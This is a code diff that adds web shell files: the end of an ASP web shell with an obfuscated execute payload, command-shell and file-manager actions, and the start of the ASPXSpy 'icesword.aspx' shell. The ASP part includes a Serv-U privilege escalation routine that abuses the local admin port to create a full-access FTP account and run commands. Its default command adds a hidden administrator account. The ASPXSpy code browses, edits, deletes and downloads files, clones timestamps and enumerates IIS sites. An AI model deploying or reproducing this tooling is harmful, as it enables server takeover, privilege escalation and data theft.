+execute(king("`>kz/<>rz/<`&)`SNQKJXBU_NSINSU`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<���������ASK>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UB`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<ͳϵ���������>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<`&)`UNBUUSZBNY_XB_NSATMG`(ltswqokqIktcktU.zltxjtN&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<����MYZ�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/< `&vgf&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<��ʱ�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>dkgy/<>kz/<>rz/<>'9'=txsqc 'fgozeq'=tdqf 'ftrroi'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'________________'=txsqc 'zodwxl'=thnz zxhfo<>'bh1:ktrkgw'=tsnzl'`&)`NWWQ_VQZBV`(ltswqokqIktcktU.zltxjtN&`'=txsqc '60'=tmol 'ho'=tdqf 'zbtz'=thnz zxhfo<>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<YC�����>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>'afqsw_'=ztukqz 'dkgyho'=tdqf 'hlq.ho/tktiv/wtv/ukg.sstilwtv//:hzzi'=fgozeq zlgh=rgiztd dkgy<>kz/<>rz/<`&)`STQG_NSINSU`(ltswqokqIktcktl.zltxjtk&`>'XXXXXX#'=kgsgeuw rz<>rz/< >'XXXXXX#'=kgsgeuw rz<>rz/<�������>'XXXXXX#'=kgsgeuw '119'=izrov '19'=ziuoti rz<>'ktzfte'=fuosq kz<>kz/<>rz/<Ϣ�ż��������>'xftd'=kgsgeuw 'ktzfte'=fuosq '8'=fqhlsge '19'=ziuoti rz<>kz<>'ktzfte'=fuosq '1'=uforrqhsste '0'=ufoeqhlsste '1'=ktrkgw 'xftd'=kgsgeuw '%13'=izrov tswqz<>kw<`=CU"))
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>�������� 127.0.0.1:"&port&",ʹ���û���: "&user&",���"&pass&"...<center>');"
+j"setTimeout('document.all.goldsun.submit();',4000);"
+j"</script>"
+case 2
+set b=Server.CreateObject("Microsoft.XMLHTTP")
+b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
+b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
+set session("b")=b
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
+j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
+j"<script language='javascript'>"
+j"document.write('<center>��������Ȩ��,��ȴ�...,<center>');"
+j"setTimeout(""document.all.goldsun.submit();"",4000);"
+j"</script>"
+case 3
+set c=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
+a.send loginuser & loginpass & mt & deldomain & quit
+set session("a")=a
+j"<center>��Ȩ���,��ִ��������,�ɹ������ο���Ʒ��<br><font color=red>"&cmd&"</font><br><br>"
+j"<input type=button value=' ���ؼ��� ' onClick=""location.href='?Action=Servu';"">"
+j"</center>"
+case else
+on error resume next
+set a=session("a")
+set b=session("b")
+set c=session("c")
+a.abort
+Set a = Nothing
+b.abort
+Set b = Nothing
+c.abort
+Set c = Nothing
+j"<center><form method='post' name='goldsun'>"
+j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
+j"<tr align='center' valign='middle'>"
+j"<td colspan='2'>Serv-U ����Ȩ�� by Sam</td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td width='100'>�û���:</td>"
+j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �</td>"
+j"<td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>�� �ڣ�</td>"
+j"<td><input name='port' type='text' id='port' value='43958'></td>"
+j"</tr>"
+j"<tr align='center' valign='middle'>"
+j"<td>ϵͳ·����</td>"
+j" <td><input name='f' type='text' id='f' value='"&f&"' size='8'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td>�����</td>"
+j" <td><input name='c' type='text' id='c' value='cmd /c net user admin$ 123456 /add & net localgroup administrators admin$ /add' size='50'></td>"
+j" </tr>"
+j" <tr align='center' valign='middle'>"
+j" <td colspan='2'><input type='submit' name='Submit' value='�ύ'> "
+j"<input type='reset' name='Submit2' value='����'>"
+j"<input name='SUaction' type='hidden' id='action' value='1'></td>"
+j"</tr></table></form></center>"
+end select
+function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject(CONST_FSO)
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+case"MMD":MMD()
+case"ReadREG":call ReadREG()
+case"delpoint":call delpoint()
+case"Show1File":Set ABC=New LBF:ABC.Show1File(Session("FolderPath")):Set ABC=Nothing
+case"DownFile":DownFile FName:ShowErr()
+case"DelFile":Set ABC=New LBF:ABC.DelFile(FName):Set ABC=Nothing
+case"EditFile":Set ABC=New LBF:ABC.EditFile(FName):Set ABC=Nothing
+case"CopyFile":Set ABC=New LBF:ABC.CopyFile(FName):Set ABC=Nothing
+case"MoveFile":Set ABC=New LBF:ABC.MoveFile(FName):Set ABC=Nothing
+case"DelFolder":Set ABC=New LBF:ABC.DelFolder(FName):Set ABC=Nothing
+case"CopyFolder":Set ABC=New LBF:ABC.CopyFolder(FName):Set ABC=Nothing
+case"MoveFolder":Set ABC=New LBF:ABC.MoveFolder(FName):Set ABC=Nothing
+case"NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
+case"UpFile":UpFile()
+case"TSearch":TSearch()
+case"pcanywhere4":pcanywhere4()
+case"Cmd1Shell":Cmd1Shell()
+case"Logout":Session.Contents.Remove("kkk"):Response.Redirect URL
+case"Course":Course()
+case"Alexa":Alexa()
+case"suftp":suftp()
+case"upload":upload()
+case"radmin":radmin()
+case"pcanywhere4":pcanywhere4()
+case"goback":goback()
+Case "ProFile":ProFile()
+case"php":php()
+case"apjdel":apjdel()
+case"cmdx":cmdx()
+case"aspx":aspx()
+case"hiddenshell":hiddenshell()
+case"ScanDriveForm" : ScanDriveForm
+Case "CustomScanDriveForm":CustomScanDriveForm()
+case"ScanDrive" : ScanDrive Request("Drive")
+case"ScFolder"  : ScFolder Request("Folder")
+  Case Else MainForm()
+End Select
+if Action<>"Servu" then ShowErr()
+j"</body></html>"%>
\ No newline at end of file
diff --git a/aspx/icesword.aspx b/aspx/icesword.aspx
new file mode 100644
index 0000000..36d793c
--- /dev/null
+++ b/aspx/icesword.aspx
@@ -0,0 +1,2578 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Diagnostics"%>
+<%@ import Namespace="System.Data"%>
+<%@ import Namespace="System.Management"%>
+<%@ import Namespace="System.Data.OleDb"%>
+<%@ import Namespace="Microsoft.Win32"%>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ import Namespace="System.Net" %>
+<%@ import Namespace="System.Runtime.InteropServices"%>
+<%@ import Namespace="System.DirectoryServices"%>
+<%@ import Namespace="System.ServiceProcess"%>
+<%@ import Namespace="System.Text.RegularExpressions"%>
+<%@ Import Namespace="System.Threading"%>
+<%@ Import Namespace="System.Data.SqlClient"%>
+<%@ import Namespace="Microsoft.VisualBasic"%>
+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<script runat="server">
+public string Password="571df1818893b45ad4fd9697b55b3679";//
+public string vbhLn="ASPXSpy";
+public int TdgGU=1;
+protected OleDbConnection Dtdr=new OleDbConnection();
+protected OleDbCommand Kkvb=new OleDbCommand();
+public NetworkStream NS=null;
+public NetworkStream NS1=null;
+TcpClient tcp=new TcpClient();
+TcpClient zvxm=new TcpClient();
+ArrayList IVc=new ArrayList();
+protected void Page_load(object sender,EventArgs e)
+{
+YFcNP(this);
+fhAEn();
+if (!pdo())
+{
+return;
+}
+if(IsPostBack)
+{
+string tkI=Request["__EVENTTARGET"];
+string VqV=Request["__File"];
+if(tkI!="")
+{
+switch(tkI)
+{
+case "Bin_Parent":
+krIR(Ebgw(VqV));
+break;
+case "Bin_Listdir":
+krIR(Ebgw(VqV));
+break;
+case "kRXgt":
+kRXgt(Ebgw(VqV));
+break;
+case "Bin_Createfile":
+gLKc(VqV);
+break;
+case "Bin_Editfile":
+gLKc(VqV);
+break;
+case "Bin_Createdir":
+stNPw(VqV);
+break;
+case "cYAl":
+cYAl(VqV);
+break;
+case "ksGR":
+ksGR(Ebgw(VqV));
+break;
+case "SJv":
+SJv(VqV);
+break;
+case "Bin_Regread":
+tpRQ(Ebgw(VqV));
+break;
+case "hae":
+hae();
+break;
+case "urJG":
+urJG(VqV);
+break;
+}
+if(tkI.StartsWith("dAJTD"))
+{
+dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
+}
+else if(tkI.StartsWith("Tlvz"))
+{
+Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
+}
+else if(tkI.StartsWith("Bin_CFile"))
+{
+YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
+}
+}
+}
+else
+{
+PBZw();
+}
+}
+public bool pdo()
+{
+if(Request.Cookies[vbhLn]==null)
+{
+tZSx();
+return false;
+}
+else
+{
+if (Request.Cookies[vbhLn].Value != Password)
+{
+tZSx();
+return false;
+}
+else
+{
+return true;
+}
+}
+}
+public void tZSx()
+{
+ljtzC.Visible=true;
+ZVS.Visible=false;
+}
+protected void YKpI(object sender,EventArgs e)
+{
+Session.Abandon();
+Response.Cookies.Add(new HttpCookie(vbhLn,null));
+tZSx();
+}
+public void PBZw()
+{
+ZVS.Visible=true;
+ljtzC.Visible=false;
+Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
+Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
+Bin_Button_KillMe.Attributes["onClick"]="if(confirm('确定要自杀?')){Bin_PostBack('hae','');};";
+Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
+Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
+if (AXSbb.Value==string.Empty)
+{
+AXSbb.Value=OElM(Server.MapPath("."));
+}
+Bin_H2_Title.InnerText="文件(夹)管理 >>";
+krIR(AXSbb.Value);
+}
+public void fhAEn()
+{
+try
+{
+string[] YRgt=Directory.GetLogicalDrives();
+for(int i=0;i<YRgt.Length;i++)
+{
+Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
+Bin_Span_Drv.Controls.Add(c);
+LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
+nxeDR.Command+=new CommandEventHandler(this.iVk);
+}
+}catch(Exception ex){}
+}
+public string OElM(string path)
+{
+if(path.Substring(path.Length-1,1)!=@"\")
+{
+path=path+@"\";
+}
+return path;
+}
+public string nrrx(string path)
+{
+char[] trim={'\\'};
+if(path.Substring(path.Length-1,1)==@"\")
+{
+path=path.TrimEnd(trim);
+}
+return path;
+}
+[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
+public static extern int OMZP(string nDrive);
+public string mFvj(string instr)
+{
+string EuXD=string.Empty;
+int num=OMZP(instr);
+switch(num)
+{
+case 1:
+EuXD="Unknow("+instr+")";
+break;
+case 2:
+EuXD="Removable("+instr+")";
+break;
+case 3:
+EuXD="磁盘("+instr+")";
+break;
+case 4:
+EuXD="Network("+instr+")";
+break;
+case 5:
+EuXD="CDRom("+instr+")";
+break;
+case 6:
+EuXD="RAM Disk("+instr+")";
+break;
+}
+return EuXD.Replace(@"\","");
+}
+public string MVVJ(string instr)
+{
+byte[] tmp=Encoding.Default.GetBytes(instr);
+return Convert.ToBase64String(tmp);
+}
+public string Ebgw(string instr)
+{
+byte[] tmp=Convert.FromBase64String(instr);
+return Encoding.Default.GetString(tmp);
+}
+public void krIR(string path)
+{
+WICxe();
+CzfO.Visible=true;
+Bin_H2_Title.InnerText="文件(夹)管理 >>";
+AXSbb.Value=OElM(path);
+DirectoryInfo GQMM=new DirectoryInfo(path);
+if(Directory.GetParent(nrrx(path))!=null)
+{
+string bg=OKM();
+TableRow p=new TableRow();
+for(int i=1;i<6;i++)
+{
+TableCell pc=new TableCell();
+if(i==1)
+{
+pc.Width=Unit.Parse("2%");
+pc.Text="<font face='wingdings' size='4'>0</font>";
+p.CssClass=bg;
+}
+if(i==2)
+{
+pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
+}
+p.Cells.Add(pc);
+UGzP.Rows.Add(p);
+}
+}
+try
+{
+int vLlH=0;
+foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
+{
+string bg=OKM();
+vLlH++;
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+tc.Width=Unit.Parse("2%");
+tc.Text="<font face='wingdings' size='4'>0</font>";
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tr.Cells.Add(tc);
+TableCell HczyN=new TableCell();
+HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
+tr.Cells.Add(HczyN);
+TableCell LYZK=new TableCell();
+LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
+tr.Cells.Add(LYZK);
+UGzP.Rows.Add(tr);
+TableCell ERUL=new TableCell();
+ERUL.Text="--";
+tr.Cells.Add(ERUL);
+UGzP.Rows.Add(tr);
+TableCell ZGKh=new TableCell();
+ZGKh.Text="<a href=\"javascript:if(confirm('确定要删除此文件(夹) ?')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">删除</a> | <a href='#' onclick=\"var filename=prompt('请输入文件夹名称:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">重命名</a>";
+tr.Cells.Add(ZGKh);
+UGzP.Rows.Add(tr);
+}
+TableRow cKVA=new TableRow();
+cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
+cKVA.Attributes["bgcolor"]="#dddddd";
+TableCell JlmW=new TableCell();
+JlmW.Attributes["colspan"]="6" ;
+JlmW.Attributes["height"]="5";
+cKVA.Cells.Add(JlmW);
+UGzP.Rows.Add(cKVA);
+int aYRwo=0;
+foreach(FileInfo Bin_Files in GQMM.GetFiles())
+{
+aYRwo++;
+string gb=OKM();
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+tc.Width=Unit.Parse("2%");
+tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=gb;
+tr.Attributes["onmouseout"]="this.className='"+gb+"';";
+tr.Cells.Add(tc);
+TableCell filename=new TableCell();
+if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
+{
+string url=Request.Url.ToString();
+filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
+}
+else
+{
+filename.Text=Bin_Files.Name;
+}
+TableCell albt=new TableCell();
+albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
+TableCell YzK=new TableCell();
+YzK.Text=mTG(Bin_Files.Length);
+TableCell GLpi=new TableCell();
+GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">下载</a> | <a href='#' onclick=\"var filename=prompt('请输入新的文件名:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">复制</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">编辑</a> | <a href='#' onclick=\"var filename=prompt('请输入新的文件名:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">重命名</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">修改文件属性</a> ";
+tr.Cells.Add(filename);
+tr.Cells.Add(albt);
+tr.Cells.Add(YzK);
+tr.Cells.Add(GLpi);
+UGzP.Rows.Add(tr);
+}
+string lgb=OKM();
+TableRow oWam=new TableRow();
+oWam.CssClass=lgb;
+for(int i=1;i<4;i++)
+{
+TableCell lGV=new TableCell();
+if(i==1)
+{
+lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
+}
+if(i==2)
+{
+lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
+}
+if(i==3)
+{
+lGV.ColumnSpan=4;
+lGV.Style.Add("text-align","right");
+lGV.Text=vLlH+" 文件夹/ "+aYRwo+" 文件";
+}
+oWam.Cells.Add(lGV);
+}
+UGzP.Rows.Add(oWam);
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public string OKM()
+{
+TdgGU++;
+if(TdgGU % 2==0)
+{
+return "alt1";
+}
+else
+{
+return "alt2";
+}
+}
+public void kRXgt(string qcKu)
+{
+try
+{
+Directory.Delete(qcKu,true);
+xseuB("Directory delete new success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(Directory.GetParent(qcKu).ToString());
+}
+public void dAJTD(string sdir,string ddir)
+{
+try
+{
+Directory.Move(sdir,ddir);
+xseuB("Directory Renamed Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void Tlvz(string sfile,string dfile)
+{
+try
+{
+File.Move(sfile,dfile);
+xseuB("File Renamed Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void YByN(string spath,string dpath)
+{
+try
+{
+File.Copy(spath,dpath);
+xseuB("File Copy Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void stNPw(string path)
+{
+try
+{
+Directory.CreateDirectory(AXSbb.Value+path);
+xseuB("Directory created success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void gLKc(string path)
+{
+if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
+{
+foreach(ListItem item in NdCX.Items)
+{
+if(item.Selected=true)
+{
+item.Selected=false;
+}
+}
+}
+Bin_H2_Title.InnerHtml="创建/编辑文件 >>";
+WICxe();
+vrFA.Visible=true;
+if(path.IndexOf(":")< 0)
+{
+Sqon.Value=AXSbb.Value+path;
+}
+else
+{
+Sqon.Value=path;
+}
+if(File.Exists(Sqon.Value))
+{
+StreamReader sr;
+if(NdCX.SelectedItem.Text=="UTF-8")
+{
+sr=new StreamReader(Sqon.Value,Encoding.UTF8);
+}
+else
+{
+sr=new StreamReader(Sqon.Value,Encoding.Default);
+}
+Xgvv.InnerText=sr.ReadToEnd();
+sr.Close();
+}
+else
+{
+Xgvv.InnerText=string.Empty;
+}
+}
+public void ksGR(string path)
+{
+FileInfo fs=new FileInfo(path);
+Response.Clear();
+Page.Response.ClearHeaders();
+Page.Response.Buffer=false;
+this.EnableViewState=false;
+Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
+Response.AddHeader("Content-Length",fs.Length.ToString());
+Page.Response.ContentType="application/unknown";
+Response.WriteFile(fs.FullName);
+Page.Response.Flush();
+Page.Response.Close();
+Response.End();
+Page.Response.Clear();
+}
+public void SJv(string path)
+{
+try
+{
+string[] spdT=path.Split(',');
+for(int i=0;i<spdT.Length-1;i++)
+{
+File.Delete(AXSbb.Value+Ebgw(spdT[i]));
+}
+xseuB("File Delete Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void hae()
+{
+try
+{
+File.Delete(Request.PhysicalPath);
+
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void cYAl(string path)
+{
+Bin_H2_Title.InnerHtml="克隆文件的最后修改时间 >>";
+WICxe();
+zRyG.Visible=true;
+QiFB.Value=AXSbb.Value+path;
+lICp.Value=AXSbb.Value;
+pWVL.Value=AXSbb.Value+path;
+string Att=File.GetAttributes(QiFB.Value).ToString();
+if(Att.LastIndexOf("ReadOnly")!=-1)
+{
+ZhWSK.Checked=true;
+}
+if(Att.LastIndexOf("System")!=-1)
+{
+SsR.Checked=true;
+}
+if(Att.LastIndexOf("Hidden")!=-1)
+{
+ccB.Checked=true;
+}
+if(Att.LastIndexOf("Archive")!=-1)
+{
+fbyZ.Checked=true;
+}
+yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
+uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
+aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
+}
+public static String mTG(Int64 fileSize)
+{
+if(fileSize<0)
+{
+throw new ArgumentOutOfRangeException("fileSize");
+}
+else if(fileSize >= 1024 * 1024 * 1024)
+{
+return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
+}
+else if(fileSize >= 1024 * 1024)
+{
+return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
+}
+else if(fileSize >= 1024)
+{
+return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
+}
+else
+{
+return string.Format("{0} B",fileSize);
+}
+}
+private bool SGde(string sSrc)
+{
+Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
+if(reg.IsMatch(sSrc))
+{
+return true;
+}
+else
+{
+return false;
+}
+}
+public void AdCx()
+{
+string qcKu=string.Empty;
+string mWGEm="IIS://localhost/W3SVC";
+GlI.Style.Add("word-break","break-all");
+try
+{
+DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
+int fmW=0;
+foreach(DirectoryEntry child in HHzcY.Children)
+{
+if(SGde(child.Name.ToString()))
+{
+fmW++;
+DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
+DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
+string bg=OKM();
+TableRow TR=new TableRow();
+TR.Attributes["onmouseover"]="this.className='focus';";
+TR.CssClass=bg;
+TR.Attributes["onmouseout"]="this.className='"+bg+"';";
+TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
+for(int i=1;i<6;i++)
+{
+try
+{
+TableCell tfit=new TableCell();
+switch(i)
+{case 1:
+tfit.Text=fmW.ToString();
+break;
+case 2:
+tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
+break;
+case 3:
